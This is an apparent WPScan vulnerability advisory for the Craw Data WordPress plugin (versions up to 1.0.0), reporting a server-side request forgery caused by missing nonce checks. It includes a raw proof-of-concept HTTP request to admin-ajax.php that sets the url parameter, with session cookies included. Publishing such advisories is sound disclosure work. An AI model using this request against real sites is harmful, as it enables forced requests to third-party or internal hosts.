wpvulndb
Dhanesh Sivasamy
WPVDB-ID:FD9853E8-B3AE-4A10-8389-8A4A11A8297C
Aug 19, 2022 - 12:00 a.m.

Craw Data <= 1.0.0 - Server Side Request Forgery

Source: wpscan.com
Tags: crawdata, ssrf, vulnerability, nonce checks, wordpress

EPSS: 0.001 (percentile 33.1%)

The plugin does not implement nonce checks, which could allow attackers to make a logged-in admin change the url value, performing unwanted crawls on third-party sites (SSRF).

PoC

When configuring the CrawData addon, the request is as follows:

GET /wordpress/wp-admin/admin-ajax.php?url=http%3A%2F%2FTARGET.SITE%3Fpage1.html&action=crawDataAjax HTTP/1.1
Host: vulnerable.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://vulnerable.site/wordpress/wp-admin/admin.php?page=ot-page
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=dn%7C1653675200%7CvLuUw1iVb1C4dE16OPdeTTKf0KtD6Uo8ZW65rn3VQAA%7Ccbcd17b27ea9476f321e86fda7ecef8f5933ebd3f4305f2404dd4c8974b66faa; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=dn%7C1653675200%7CvLuUw1iVb1C4dE16OPdeTTKf0KtD6Uo8ZW65rn3VQAA%7C622f3fd0b44a0ad5a74e24bab674c000ef47739fc78c7c496e20f786013b9424; wp-settings-time-1=1653502574
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

- Replacing the http%3A%2F%2Fdnoscp.com%3Fpage1.html with http%3A%2F%2F successfully makes the request as the WordPress instance
- SSRF Identified
